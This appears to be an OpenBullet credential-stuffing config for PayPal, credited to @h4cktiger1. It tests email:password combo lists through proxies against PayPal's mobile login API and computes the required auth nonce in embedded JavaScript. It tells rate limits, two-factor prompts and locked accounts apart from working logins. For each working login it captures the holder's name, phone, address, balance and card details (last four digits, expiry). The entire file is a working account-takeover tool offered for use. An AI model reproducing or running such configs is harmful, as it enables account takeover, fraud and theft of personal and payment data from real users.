[SETTINGS]
{
  "Name": "Paypal No Captcha With Full Capture",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-24T13:34:41.2205685+08:00",
  "AdditionalInfo": "@h4cktiger1",
  "RequiredPlugins": [],
  "Author": "@h4cktiger1",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api-m.paypal.com/v1/mfsonboardingserv/user/verification/email" 
  CONTENT "{\"flowId\":\"Onboarding\",\"riskData\":\"{\\\"is_emulator\\\":false,\\\"device_uptime\\\":,\\\"ip_addrs\\\":\\\"\\\",\\\"risk_comp_session_id\\\":\\\"\\\",\\\"device_model\\\":\\\"iPhone\\\",\\\"linker_id\\\":\\\"\\\",\\\"app_version\\\":\\\"7.42.3\\\",\\\"os_type\\\":\\\"iOS\\\",\\\"location_auth_status\\\":\\\"unknown\\\",\\\"is_rooted\\\":false,\\\"ds\\\":true,\\\"TouchIDEnrolled\\\":\\\"false\\\",\\\"app_id\\\":\\\"com.yourcompany.PPClient\\\",\\\"proxy_setting\\\":\\\"host=,port=,type=\\\",\\\"conf_url\\\":\\\"https:\\\\\\/\\\\\\/www.paypalobjects.com\\\\\\/rdaAssets\\\\\\/magnes\\\\\\/magnes_ios_rec.json\\\",\\\"payload_type\\\":\\\"full\\\",\\\"rf\\\":\\\"0000\\\",\\\"app_guid\\\":\\\"\\\",\\\"email_configured\\\":true,\\\"tz_name\\\":\\\"Europe\\\\\\/\\\",\\\"locale_lang\\\":\\\"en\\\",\\\"bindSchemeAvailable\\\":\\\"crypto:kmli,biometric:faceid\\\",\\\"cloud_identifier\\\":\\\"\\\",\\\"total_storage_space\\\":127933894656,\\\"tz\\\":7200000,\\\"locale_country\\\":\\\"\\\",\\\"pairing_id\\\":\\\"\\\",\\\"dbg\\\":false,\\\"c\\\":95,\\\"sr\\\":{\\\"gy\\\":true,\\\"mg\\\":true,\\\"ac\\\":true},\\\"vendor_identifier\\\":\\\"\\\",\\\"t\\\":false,\\\"TouchIDAvailable\\\":\\\"true\\\",\\\"dc_id\\\":\\\"\\\",\\\"device_name\\\":\\\"\\\",\\\"magnes_source\\\":10,\\\"pin_lock_last_timestamp\\\":,\\\"local_identifier\\\":\\\"\\\",\\\"os_version\\\":\\\"14.6\\\",\\\"timestamp\\\":1626436936905,\\\"source_app_version\\\":\\\"7.42.3\\\",\\\"conn_type\\\":\\\"wifi\\\",\\\"PasscodeSet\\\":\\\"true\\\",\\\"magnes_guid\\\":{\\\"created_at\\\":1594847338188,\\\"id\\\":\\\"\\\"},\\\"conf_version\\\":\\\"1.0\\\",\\\"ip_addresses\\\":[\\\"\\\"],\\\"bindSchemeEnrolled\\\":\\\"none\\\",\\\"mg_id\\\":\\\"\\\",\\\"comp_version\\\":\\\"5.2.0\\\",\\\"sms_enabled\\\":true}\",\"appInfo\":\"{\\\"device_app_id\\\":\\\"com.yourcompany.PPClient\\\",\\\"client_platform\\\":\\\"Apple\\\",\\\"app_version\\\":\\\"7.42.3\\\",\\\"app_category\\\":3,\\\"app_guid\\\":\\\"\\\",\\\"push_notification_id\\\":\\\"disabled\\\"}\",\"emailId\":\"<USER>\",\"firstPartyClientId\":\"\",\"deviceInfo\":\"{\\\"device_identifier\\\":\\\"\\\",\\\"device_name\\\":\\\"\\\",\\\"device_type\\\":\\\"iOS\\\",\\\"device_key_type\\\":\\\"APPLE_PHONE\\\",\\\"device_model\\\":\\\"iPhone\\\",\\\"device_os\\\":\\\"iOS\\\",\\\"device_os_version\\\":\\\"14.6\\\",\\\"is_device_simulator\\\":false,\\\"pp_app_id\\\":\\\"\\\"}\",\"redirectUri\":\"urn:ietf:wg:oauth:2.0:oob\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: PayPal/69 (iPhone; iOS 14.6; Scale/2.00)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json" 
  HEADER "Host: api-m.paypal.com" 
  HEADER "Authorization: Basic QVY4aGRCQk04MHhsZ0tzRC1PYU9ReGVlSFhKbFpsYUN2WFdnVnB2VXFaTVRkVFh5OXBtZkVYdEUxbENxOg==" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/json" 
  HEADER "x-paypal-mobileapp: dmz-access-header" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"status\":\"Failure\",\"" 
  KEYCHAIN Success OR 
    KEY "This email already exists with PayPal" 
  KEYCHAIN Ban OR 
    KEY "RATE_LIMIT_REACHED" 

FUNCTION CurrentUnixTime -> VAR "timestamp" 

FUNCTION Substring "0" "3" "<PASS>" -> VAR "passHash" 

FUNCTION Hash SHA256 "com.paypal.android.p2pmobile6d0ad315-c8d9-4049-9860-234f6f0752e5acacd01553b2d9da<USER><passHash><timestamp>" -> VAR "hashedStuff" 

BEGIN SCRIPT JavaScript
function getAlphaBytes() {
    return ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=").split('').map(function (s) {
        return s.charCodeAt(0);
    })
}
function a(bArr) {
    let i
    let length = bArr.length
    let bArr2 = (function (s) {
        let a = [];
        while (s-- > 0)
            a.push(0);
        return a
    })(((((length + 2) / 3 | 0)) * 4))
    let i2 = 0
    while ((i2 < length)) {
        {
            let i3 = i2
            let i4 = 0
            while (true) {
                {
                    i = i2 + 3
                    if (i3 >= i) {
                        break
                    }
                    i4 <<= 8
                    if (i3 < length) {
                        i4 |= bArr[i3] & 255
                    }
                    i3++
                }
            }
            let i5 = ((i2 / 3 | 0)) * 4
            let bArr3 = getAlphaBytes()
            bArr2[i5 + 0] = bArr3[(i4 >> 18) & 63]
            bArr2[i5 + 1] = bArr3[(i4 >> 12) & 63]
            let b = 61
            bArr2[i5 + 2] = i2 + 1 < length ? bArr3[(i4 >> 6) & 63] : 61
            if (i2 + 2 < length) {
                b = getAlphaBytes()[(i4 >> 0) & 63]
            }
            bArr2[i5 + 3] = b
            i2 = i
        }
    }
    return String.fromCharCode.apply(null, bArr2)
}
function hexStringToArrayBuffer(hexString) {
    hexString = hexString.replace(/^0x/, ''); 
    if (hexString.length % 2 != 0) {
        console.log('WARNING: expecting an even number of characters in the hexString');
    }
    var bad = hexString.match(/[G-Z\s]/i);
    if (bad) {
        console.log('WARNING: found non-hex characters', bad);
    }
    var pairs = hexString.match(/[\dA-F]{2}/gi);
    var integers = pairs.map(function(s) {
        return parseInt(s, 16);
    });
    return integers;
}
var z = hexStringToArrayBuffer(hashedStuff)
var authNounce = a(z)
END SCRIPT -> VARS "authNounce"

REQUEST POST "https://api-m.paypal.com/v1/mfsauth/proxy-auth/token" AutoRedirect=FALSE 
  CONTENT "timeStamp=<timestamp>&_grantType=password&adsChallengeId=auth&authNonce=<authNounce>&firstPartyClientId=d3aacf450dd6aa992cfba77067560733&adaptiveToken=Fatty&password=<PASS>&redirectUri=urn:ietf:wg:oauth:2.0:oob&email=<USER>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: PayPal Here/437003 (iPhone; iOS 13.6; Scale/2.00)" 
  HEADER "X-PayPal-ConsumerApp-Context: %7B%22deviceLocale%22%3A%22sv_SE%22%2C%22deviceId%22%3A%22B3051EB8-394E-43B2-A860-9E92E4CBC832%22%2C%22deviceLanguage%22%3A%22sv-SE%22%2C%22deviceType%22%3A%22iOS%22%2C%22deviceNetworkCarrier%22%3A%22Comviq%22%2C%22deviceOS%22%3A%22iOS%22%2C%22appVersion%22%3A%228.1.0%22%2C%22visitorId%22%3A%22930D084B-C5CD-4DC2-A69F-5CBED08F3AEE%22%2C%22deviceMake%22%3A%22Apple%22%2C%22accountCountry%22%3A%22SE%22%2C%22appName%22%3A%22com.yourcompany.PPClient%22%2C%22sdkVersion%22%3A%221.0.0%22%2C%22appGuid%22%3A%22930D084B-C5CD-4DC2-A69F-5CBED08F3AEE%22%2C%22deviceModel%22%3A%22iPhone%22%2C%22deviceOSVersion%22%3A%2214.7.1%22%2C%22deviceLocationCountry%22%3A%22SE%22%2C%22additionalProperties%22%3A%7B%22phoneDeviceConfirmationAllowed%22%3Afalse%2C%22biometricEnrolled%22%3Atrue%2C%22biometricSupported%22%3Atrue%2C%22faceIDSupported%22%3Afalse%2C%22faceIDEnrolled%22%3Afalse%7D%2C%22deviceNetworkType%22%3A%22CTRadioAccessTechnologyLTE%22%2C%22riskVisitorId%22%3A%22EVsT913Z9hJefDUQucmPAPpjob1DK3zyjohzIW2Nywe6Km7fh8HA1wuoB5RTJeP6xpEzq67aiiBJ5-ex%22%2C%22usageTrackerSessionId%22%3A%22C664A1CF-B599-4FD7-A109-6AE48AF0AFAB%22%7D" 
  HEADER "Authorization: Basic QVY4aGRCQk04MHhsZ0tzRC1PYU9ReGVlSFhKbFpsYUN2WFdnVnB2VXFaTVRkVFh5OXBtZkVYdEUxbENxOg==" 

KEYCHECK 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" DoesNotContain "twofactor" 
    KEY "<SOURCE>" DoesNotContain "/authflow" 
    KEY "accountProfile" 
  KEYCHAIN Failure OR 
    KEY "Kontrollera uppgifterna och försök igen." 
  KEYCHAIN Ban OR 
    KEY "MaxLoginAttemptsExceeded" 
    KEY "limit" 
    KEY "Access Denied" 
    KEY "Too many requests" 
    KEY "credentials\",\"cc\":\"cv\"" 
    KEY "EmailPasswordTokenRequest" 
    KEY "Vi beklagar" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "twofactor" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "/authflow" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "/authflow?flow=safe" 
    KEY "temporarily locked your account" 

PARSE "<SOURCE>" JSON "result.accountProfile.countryCode" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Country" 

PARSE "<SOURCE>" JSON "result.accountProfile.type" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Account type" 

PARSE "<SOURCE>" JSON "result.accountProfile.displayName" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Full Name" 

PARSE "<SOURCE>" JSON "result.accountProfile.phones[0].phoneNumber" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Phone Num" 

PARSE "<SOURCE>" LR "currencyCode\":\"" "\"" CreateEmpty=FALSE -> CAP "Currency" 

PARSE "<SOURCE>" LR "\"fullName\":\"" "\"" CreateEmpty=FALSE -> CAP "Name" 

PARSE "<SOURCE>" LR "\"line1\":\"" "\"" CreateEmpty=FALSE -> CAP "Adress" 

PARSE "<SOURCE>" LR "city\":\"" "\"" CreateEmpty=FALSE -> CAP "City" 

PARSE "<SOURCE>" LR ",\"state\":\"" "\"" CreateEmpty=FALSE -> CAP "State" 

PARSE "<SOURCE>" LR "postalCode\":\"" "\"" CreateEmpty=FALSE -> CAP "PostalCode" 

PARSE "<SOURCE>" JSON "tokenValue" -> VAR "token" 

REQUEST GET "https://api-m.paypal.com/v1/mfsconsumer/wallet/@me/balance" 
  
  HEADER "User-Agent: PayPal/145 (Samsung; Android 6.0; Scale/2.00)" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "X-PayPal-ConsumerApp-Context: %7B%22visitId%22:%22d3aacf450dd6aa992cfba77067560733%22,%22visitorId%22:%22acacd01553b2d9da%22,%22deviceLanguage%22:%22en%22,%22deviceLocale%22:%22en_US%22,%22appName%22:%22com.paypal.android.p2pmobile%22,%22appGuid%22:%226d0ad315-c8d9-4049-9860-234f6f0752e5%22,%22appVersion%22:%226.9.0%22,%22sdkVersion%22:%222.8.3%22,%22deviceOS%22:%22Android%22,%22deviceOSVersion%22:%226.0%22,%22deviceMake%22:%22motorola%22,%22deviceModel%22:%22MotoG3-TE%22,%22deviceType%22:%22Android%22,%22deviceNetworkType%22:%22HSPAP%22,%22deviceNetworkCarrier%22:%22Vivo%22,%22deviceId%22:%22acacd01553b2d9da%22,%22usageTrackerSessionId%22:%22167473039%22%7D" 

PARSE "<SOURCE>" LR "total\":{\"currencyCode\":\"" "\",\"value\":" -> VAR "Balanc" 

PARSE "<SOURCE>" LR "<Balanc>\",\"value\":" ",\"scale\":" CreateEmpty=FALSE -> CAP "Balance" 

FUNCTION Constant "<Balance> - <Balanc>" -> CAP "Balance" 

REQUEST GET "https://api-m.paypal.com/v1/mfsconsumer/wallet/account?id=BANK%2CCREDEBIT%2CPAYMENTTOKEN&include-card-art=true&" 
  
  HEADER "User-Agent: PayPal/145 (Samsung; Android 6.0; Scale/2.00)" 
  HEADER "Authorization: Bearer <token>" 
  HEADER "X-PayPal-ConsumerApp-Context: %7B%22visitId%22:%22d3aacf450dd6aa992cfba77067560733%22,%22visitorId%22:%22acacd01553b2d9da%22,%22deviceLanguage%22:%22en%22,%22deviceLocale%22:%22en_US%22,%22appName%22:%22com.paypal.android.p2pmobile%22,%22appGuid%22:%226d0ad315-c8d9-4049-9860-234f6f0752e5%22,%22appVersion%22:%226.9.0%22,%22sdkVersion%22:%222.8.3%22,%22deviceOS%22:%22Android%22,%22deviceOSVersion%22:%226.0%22,%22deviceMake%22:%22motorola%22,%22deviceModel%22:%22MotoG3-TE%22,%22deviceType%22:%22Android%22,%22deviceNetworkType%22:%22HSPAP%22,%22deviceNetworkCarrier%22:%22Vivo%22,%22deviceId%22:%22acacd01553b2d9da%22,%22usageTrackerSessionId%22:%22167473039%22%7D" 

PARSE "<SOURCE>" LR "\",\"type\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Card Name" 

PARSE "<SOURCE>" LR "\"cardNumberPartial\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Last 4" 

PARSE "<SOURCE>" LR "expirationMonth\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "Month" 

PARSE "<SOURCE>" LR "expirationYear\":" "," Recursive=TRUE CreateEmpty=FALSE -> CAP "Year" 

PARSE "<SOURCE>" LR "displayName\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Display Name" 

